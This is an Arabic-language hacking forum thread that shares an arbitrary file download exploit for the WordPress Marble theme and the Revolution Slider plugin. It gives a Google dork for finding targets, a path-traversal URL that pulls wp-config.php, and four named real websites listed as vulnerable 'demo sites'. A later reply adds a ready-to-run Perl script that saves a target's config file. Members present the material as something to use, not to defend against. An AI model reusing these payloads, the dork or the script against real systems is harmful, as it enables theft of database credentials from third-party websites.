Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

NULL Pointer عضو مميز
  • شكراً: 254
  • تم شكره 1512 مرة في 211 مشاركة

ثغرة LFD بسيطة اكتشفتها اليوم

كود:
Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability

Exploit Author : NULL_Pointer

Date : 17/09/2014

Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650

Version: 1.1.2

Google Dork : inurl:"/wp-content/themes/marble/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Marble suffers from Arbitrary File Download Vulnerability.

Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
هههه الأيام هذي نشبعكم ثغرات

12 أعضاء قالوا شكراً لـ NULL Pointer على المشاركة المفيدة:
hamza parola عضو مميز
  • شكراً: 321
  • تم شكره 1133 مرة في 285 مشاركة

اكتشفتها اليوم ؟

شوف السكربت الخاص بك نتاع فحص lfd راك تلقاها

توقيع
العبادة كثرو في الدومين
غير لتعلم جوج كلمات حس براصو وصل
الهربة و شكرا

http://im49.gulfup.com/o4fk9Z.jpg
فريق حلمي انونيموس

Made In Morocco
NULL Pointer عضو مميز
  • شكراً: 254
  • تم شكره 1512 مرة في 211 مشاركة

المشاركة الأصلية كتبت بواسطة hamza parola اقتباس :
اكتشفتها اليوم ؟

شوف السكربت الخاص بك نتاع فحص lfd راك تلقاها

o.O


الأعضاء الذين قالوا شكراً لـ NULL Pointer على المشاركة المفيدة:
hamza parola عضو مميز
  • شكراً: 321
  • تم شكره 1133 مرة في 285 مشاركة

المشاركة الأصلية كتبت بواسطة NULL Pointer اقتباس :



o.O


قصدي الاستغلال :

كود بلغة HTML:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
هي تعتبر ثغرة في

WordPress Slider Revolution Responsive

توقيع
العبادة كثرو في الدومين
غير لتعلم جوج كلمات حس براصو وصل
الهربة و شكرا

http://im49.gulfup.com/o4fk9Z.jpg
فريق حلمي انونيموس

Made In Morocco
الأعضاء الذين قالوا شكراً لـ hamza parola على المشاركة المفيدة:
NULL Pointer عضو مميز
  • شكراً: 254
  • تم شكره 1512 مرة في 211 مشاركة

المشاركة الأصلية كتبت بواسطة hamza parola اقتباس :
قصدي الاستغلال :

كود بلغة HTML:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
هي تعتبر ثغرة في

WordPress Slider Revolution Responsive
نعم عارف الثغرة أساسا موجودة في البلوجين revslider وبعض الثيمات مركبة هذا البلوجين كموديل معها (مثل marble وغيره...).

فلذلك الإستغلال واحد.

2 أعضاء قالوا شكراً لـ NULL Pointer على المشاركة المفيدة:
Mr_AnarShi-T عضو مميز
  • شكراً: 246
  • تم شكره 718 مرة في 170 مشاركة

هذه هي مشكلة الوردبريس و غباء المرمجين فيها لو تلاحظ ثغرات الأبلود
3 أنواع uploadify & themify & orange_theme موجودة في أغلبية التيمات القديمة
و الإستغلال نفسو لكل نوع
كذلك علي مستوي ثغرات LFD هالمدة و غيرها
بس يكون التغيير علي مستوي المسارات و الملفات المصابة
إكتشاف رائع أخي null واصل
تحياتي في أمان الله ~

توقيع
Perl & Java Lov3r

No perl No life
الأعضاء الذين قالوا شكراً لـ Mr_AnarShi-T على المشاركة المفيدة:
miutex عضو مميز
  • شكراً: 87
  • تم شكره 271 مرة في 63 مشاركة

إستغلال بسيط عن طريق الPerl

كود:
#!/usr/bin/perl

use LWP::Simple;

print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "#                   Marble WP Theme File Download Vulnerability        #\n";
print "#                   Exploit Author: NULL Pointer                       #\n";
print "#                   Coder: TUNISIAN CYBER  (miutex)                    #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";

$target = $ARGV[0];
my $status = getstore($target . "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php", "config.txt");
 
if ( is_success($status) )
{
  print "Config Downloaded!\n";
}
else
{
  print "Error!: $status\n";
}

توقيع
" يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ"
سورة المجادلة